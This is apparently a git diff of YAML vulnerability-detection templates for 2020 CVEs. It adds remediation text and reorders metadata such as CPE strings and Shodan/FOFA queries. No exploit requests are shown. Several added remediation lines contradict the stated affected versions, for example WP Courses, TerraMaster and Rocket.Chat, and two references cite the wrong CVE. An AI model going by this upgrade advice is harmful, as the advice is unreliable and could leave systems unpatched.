attackers with network access via IIOP to compromise Oracle WebLogic Server. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://github.com/hktalent/CVE-2020-2551 - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 @@ -15,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-2551 epss-score: 0.97468 - cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* epss-percentile: 0.99939 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 7d34ba0cab..56dc9b6062 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://www.exploit-db.com/exploits/48812 - https://github.com/zoujingli/ThinkAdmin/issues/244 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-25540 cwe-id: CWE-22 epss-score: 0.96418 - cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* epss-percentile: 0.99372 + cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ctolog diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index f218afdebf..dc4ee3cc0b 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder. + remediation: | + Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability. reference: - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html - http://kb.commvault.com/article/63264 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-25780 cwe-id: CWE-22 epss-score: 0.01865 - cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* epss-percentile: 0.869 + cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: commvault diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 2d31489d6e..54a3bd603f 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -6,20 +6,20 @@ info: severity: medium description: | HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode. + remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. reference: - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 - https://www.hashicorp.com/blog/category/consul - https://nvd.nist.gov/vuln/detail/CVE-2020-25864 - https://security.gentoo.org/glsa/202208-09 - remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-25864 cwe-id: CWE-79 epss-score: 0.00255 - cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* epss-percentile: 0.62621 + cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 vendor: hashicorp diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index 2b568939da..d780b4f80d 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information. + remediation: | + Apply the latest security patches provided by Cisco to fix the vulnerability. reference: - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 218fc17c5f..6d435503d9 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter. + remediation: | + Upgrade to Event Espresso Core-Reg version 4.10.7.p or later to mitigate this vulnerability. reference: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-26153 cwe-id: CWE-79 epss-score: 0.00127 - cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* epss-percentile: 0.46567 + cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: eventespresso product: event_espresso + framework: wordpress tags: cve,cve2020,xss,wordpress,wp-plugin http: diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 78b8c8a1af..305ccadb0c 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -5,6 +5,8 @@ info: author: CasperGN,daffainfo severity: critical description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests. + remediation: | + Upgrade Alerta to version 8.1.0 or later to mitigate this vulnerability. reference: - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh - https://tools.ietf.org/html/rfc4513#section-5.1.2 @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-26214 cwe-id: CWE-287 epss-score: 0.01258 - cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* epss-percentile: 0.83887 + cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: alerta_project diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index ff2ededbd1..671cbbad19 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -6,21 +6,21 @@ info: severity: high description: | XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected. + remediation: Fixed in 1.4.14. reference: - https://x-stream.github.io/CVE-2020-26217.html - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2 - https://nvd.nist.gov/vuln/detail/cve-2020-26217 - https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E - remediation: Fixed in 1.4.14. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-26217 cwe-id: CWE-78 epss-score: 0.97456 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.99927 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index bf3f093b03..13d1f4a1dc 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -6,27 +6,27 @@ info: severity: high description: | PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + remediation: Fixed in 4.2.1. reference: - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html - https://packagist.org/packages/prestashop/productcomments - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9 - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa - remediation: Fixed in 4.2.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-26248 cwe-id: CWE-89 epss-score: 0.01502 - cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* epss-percentile: 0.85288 + cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: - max-request: 1 verified: true - framework: prestashop + max-request: 1 vendor: prestashop product: productcomments + framework: prestashop tags: cve,cve2020,sqli,prestshop,packetstorm http: diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index e2c39932a4..5766b58c63 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -6,21 +6,21 @@ info: severity: high description: | XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. reference: - https://x-stream.github.io/CVE-2020-26258.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258 - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28 - https://nvd.nist.gov/vuln/detail/CVE-2020-26258 - https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E - remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.93377 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.98715 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 86468f2e84..5534237a40 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -5,6 +5,8 @@ info: author: _0xf4n9x_,pikpikcu severity: medium description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Gitlab CE/EE to version 13.6.3 or later. reference: - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-26413 cwe-id: CWE-200 epss-score: 0.65771 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* epss-percentile: 0.97457 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 - shodan-query: http.title:"GitLab" vendor: gitlab product: gitlab + shodan-query: http.title:"GitLab" tags: hackerone,cve,cve2020,gitlab,exposure,enum,graphql http: diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 4aaecdcf7f..4218a0950b 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. + remediation: | + Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-26876 - https://www.exploit-db.com/exploits/48910 @@ -17,13 +19,13 @@ info: cve-id: CVE-2020-26876 cwe-id: CWE-306 epss-score: 0.01156 - cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* epss-percentile: 0.83081 + cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wpcoursesplugin product: wp-courses + framework: wordpress tags: cve,cve2020,wordpress,wp-plugin,exposure,edb http: diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 6062109e02..4f3b5dedfe 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ @@ -15,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26919 epss-score: 0.97414 - cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99885 + cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index e8b2a9cc0a..3e578ed1f5 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter. + remediation: | + Apply the latest security patches or upgrade to a patched version of Emby Server. reference: - https://github.com/btnz-k/emby_ssrf - https://nvd.nist.gov/vuln/detail/CVE-2020-26948 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-26948 cwe-id: CWE-918 epss-score: 0.06357 - cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* epss-percentile: 0.92728 + cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: emby diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index c0c0f0e479..dbd1cbd74d 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion. + remediation: | + Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability. reference: - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi - http://lionwiki.0o.cz/index.php?page=Main+page @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-27191 cwe-id: CWE-22 epss-score: 0.00698 - cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* epss-percentile: 0.77767 + cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lionwiki diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 796359522f..f618a76212 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://redrays.io/cve-2020-2733-jd-edwards/ - https://www.oracle.com/security-alerts/cpuapr2020.html @@ -15,14 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-2733 epss-score: 0.26869 - cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* epss-percentile: 0.96147 + cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: port:8999 product:"Oracle WebLogic Server" verified: true + max-request: 1 vendor: oracle product: jd_edwards_enterpriseone_tools + shodan-query: port:8999 product:"Oracle WebLogic Server" tags: cve,cve2020,oracle,weblogic,disclosure,exposure http: diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index 24cc9cebee..f430029a07 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories. + remediation: | + Apply the latest patch or upgrade to a newer version of Akkadian Provisioning Manager to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-27191 classification: @@ -13,8 +15,8 @@ info: cve-id: CVE-2020-27361 cwe-id: CWE-668 epss-score: 0.02936 - cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* epss-percentile: 0.89526 + cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* metadata: max-request: 1 vendor: akkadianlabs diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 1b100e7a83..8ba6a6a615 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. + remediation: | + Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability. reference: - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire - https://processwire.com/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-27467 cwe-id: CWE-22 epss-score: 0.00459 - cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* epss-percentile: 0.72208 + cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: processwire diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 29621266a7..f540af8a61 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization. + remediation: | + Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397 - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070 @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-27481 cwe-id: CWE-89 epss-score: 0.12044 - cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94623 + cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: goodlayers product: good_learning_management_system + framework: wordpress tags: goodlayerslms,sqli,wpscan,cve,cve2020 http: diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 0bb91a1c14..1d2608f5e5 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. + remediation: | + Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.wftpserver.com/serverhistory.htm - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2020-27735 cwe-id: CWE-79 epss-score: 0.00217 - cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* epss-percentile: 0.59 + cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wftpserver diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 8c24851764..19945a3ecb 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations. + remediation: | + Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability. reference: - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-27866 cwe-id: CWE-288,CWE-287 epss-score: 0.00365 - cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.68896 + cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index d4a8d238d5..2fad5d25bc 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail. reference: - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html - https://cxsecurity.com/issue/WLB-2020100161 @@ -16,13 +18,13 @@ info: cve-id: CVE-2020-27982 cwe-id: CWE-79 epss-score: 0.00178 - cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* epss-percentile: 0.54259 + cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"icewarp" vendor: icewarp product: mail_server + shodan-query: title:"icewarp" tags: xss,icewarp,packetstorm,cve,cve2020 http: diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index 5f527d083f..691ed5020c 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -7,18 +7,18 @@ info: description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. + remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ - https://nvd.nist.gov/vuln/detail/CVE-2020-27866 - remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27986 cwe-id: CWE-306 epss-score: 0.1352 - cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* epss-percentile: 0.94881 + cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonarsource diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index ad40647908..ad4224d2a8 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. + remediation: | + Upgrade TerraMaster TOS to version 4.2.06 or later. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 @@ -16,14 +18,14 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28185 epss-score: 0.00406 - cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* epss-percentile: 0.70469 + cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: - fofa-query: '"TerraMaster" && header="TOS"' - max-request: 2 verified: true + max-request: 2 vendor: terra-master product: tos + fofa-query: '"TerraMaster" && header="TOS"' tags: cve,cve2020,terramaster,enum,tos http: diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 54613ff4ce..951c27fab6 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter. + remediation: | + Apply the latest security patch or update provided by TerraMaster to fix the vulnerability. reference: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-28188 cwe-id: CWE-78 epss-score: 0.97282 - cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* epss-percentile: 0.99781 + cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: terra-master diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 106dbcda32..6ca985d591 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Rocket.Chat to version 3.9.1 or later to mitigate the information disclosure vulnerability (CVE-2020-28208). reference: - https://trovent.io/security-advisory-2010-01 - https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-28208 cwe-id: CWE-203 epss-score: 0.00847 - cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* epss-percentile: 0.80027 + cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rocket.chat diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index a6ee8b49e2..abdd5d1088 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page. + remediation: | + Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability. reference: - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - https://www.mitel.com/articles/what-happened-shoretel-products @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-28351 cwe-id: CWE-79 epss-score: 0.0036 - cpe: 